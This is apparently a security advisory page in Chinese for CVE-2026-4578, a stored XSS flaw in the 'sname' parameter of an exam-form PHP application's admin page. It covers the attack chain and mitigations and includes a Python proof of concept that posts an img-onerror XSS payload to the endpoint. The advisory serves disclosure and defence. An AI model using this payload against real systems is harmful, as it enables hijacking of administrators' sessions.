CVE-2026-4578 CVSS 2.4 低危

CVE-2026-4578: Exam Form Submission跨站脚本漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4578

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

code-projects Exam Form Submission

漏洞概述

code-projects Exam Form Submission 1.0版本存在跨站脚本漏洞。该漏洞位于/admin/update_s3.php文件中的未知功能处，由于对参数sname缺乏适当的过滤，攻击者可诱导高权限用户进行交互，从而导致恶意脚本执行。攻击者可远程利用此漏洞，对系统完整性造成一定影响。

技术细节

该漏洞源于code-projects Exam Form Submission 1.0在处理/admin/update_s3.php接口时，未能正确过滤用户输入的'sname'参数。攻击者可以构造包含恶意JavaScript代码的Payload，通过该参数提交。由于CVSS向量显示需要高权限（PR:H）和用户交互（UI:R），这表明攻击通常针对具有管理权限的用户，可能通过存储型XSS的方式，当管理员访问被篡改的数据时触发。一旦脚本在受害者浏览器中执行，攻击者可利用受害者的会话执行未授权操作，尽管主要影响集中在完整性（I:L）上，对机密性影响较小（C:N/L）。

攻击链分析

STEP 1

1. 信息收集

识别运行code-projects Exam Form Submission 1.0的目标服务器，确认存在/admin/update_s3.php接口。

STEP 2

2. 构造攻击载荷

攻击者构造包含恶意JavaScript代码的Payload，针对未经过滤的'sname'参数。

STEP 3

3. 发送恶意请求

攻击者向目标服务器发送包含恶意参数的HTTP请求，将Payload存储或传递给服务器端。

STEP 4

4. 触发漏洞

具有高权限的用户（如管理员）访问受影响的页面或数据，浏览器解析并执行恶意脚本。

STEP 5

5. 执行恶意操作

利用管理员权限，恶意脚本可能执行窃取Cookie、篡改数据等操作，影响系统完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-4578
# Target: code-projects Exam Form Submission 1.0
# Vulnerable File: /admin/update_s3.php
# Vulnerable Parameter: sname

def exploit_xss(target_url):
    # Malicious payload to test XSS
    xss_payload = '<img src=x onerror=alert("CVE-2026-4578")>'
    
    # Data to be sent to the vulnerable endpoint
    # Note: Actual form fields might vary, 'sname' is the vulnerable parameter
    data = {
        'sname': xss_payload,
        # 'other_param': 'value' # Include other necessary params if known
    }
    
    try:
        # Sending the POST request
        response = requests.post(f"{target_url}/admin/update_s3.php", data=data)
        
        if response.status_code == 200:
            print(f"[+] Payload sent successfully to {target_url}")
            print("[+] Check the application response or admin panel for script execution.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1" # Replace with actual target
    exploit_xss(target)

影响范围

code-projects Exam Form Submission 1.0

防御指南

临时缓解措施

在无法立即升级的情况下，建议在服务器端部署Web应用防火墙（WAF）规则，拦截针对/update_s3.php的恶意参数请求；同时限制对管理后台的访问权限，确保只有受信任的IP可以访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4578
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4578
3 Details https://www.cvedetails.com/cve/CVE-2026-4578/
4 VulDB https://vuldb.com/cve/CVE-2026-4578
5 Link https://code-projects.org/
6 Link https://github.com/rockycheng1/cve/issues/2
7 Link https://vuldb.com/?ctiid.352415
8 Link https://vuldb.com/?id.352415
9 Link https://vuldb.com/?submit.775206

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表